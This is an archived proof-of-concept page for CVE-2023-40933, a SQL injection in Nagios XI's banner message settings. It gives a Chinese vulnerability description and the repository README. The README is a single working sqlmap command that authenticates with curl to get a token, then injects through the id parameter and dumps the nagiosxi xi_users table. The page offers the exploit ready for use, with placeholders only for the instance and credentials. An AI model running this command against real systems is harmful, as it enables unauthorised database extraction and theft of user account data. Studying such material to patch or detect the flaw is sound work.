CVE-2023-40933 PoC — Nagios XI SQL注入漏洞

Source

https://github.com/sealldeveloper/CVE-2023-40933-PoC

Associated Vulnerability

Title:Nagios XI SQL注入漏洞 (CVE-2023-40933)
Description:Nagios XI是美国Nagios公司的一套IT基础设施监控解决方案。该方案支持对应用、服务、操作系统等进行监控和预警。 Nagios XI 5.11.1及之前版本存在安全漏洞，该漏洞源于允许具有公告横幅配置权限的攻击者通过 update_banner_message() 函数的 ID 参数执行任意 SQL 命令。

Description

The sqlmap payload to exploit CVE-2023-40933

Readme

# CVE-2023-40933
The sqlmap payload to exploit CVE-2023-40933

## Payload
Required Information:

- Valid Username and Password
- Domain and path of hosted instance

```
sqlmap -D nagiosxi -T xi_users -u "https://<INSTANCE>/nagiosxi/admin/banner_message-ajaxhelper.php?action=update_banner_message_settings&id=3&token=`curl -ksX POST https://<INSTANCE>/nagiosxi/api/v1/authenticate -d "username=<USERNAME>&password=<PASSWORD>&valid_min=1000" | awk -F'"' '{print$12}'`" --dump --level 4 --risk 3 -p id --batch
```

File Snapshot


 [4.0K]  /data/pocs/fa3357b76dbd3affaa87e43070b03a5acb2489f7
└── [ 512]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!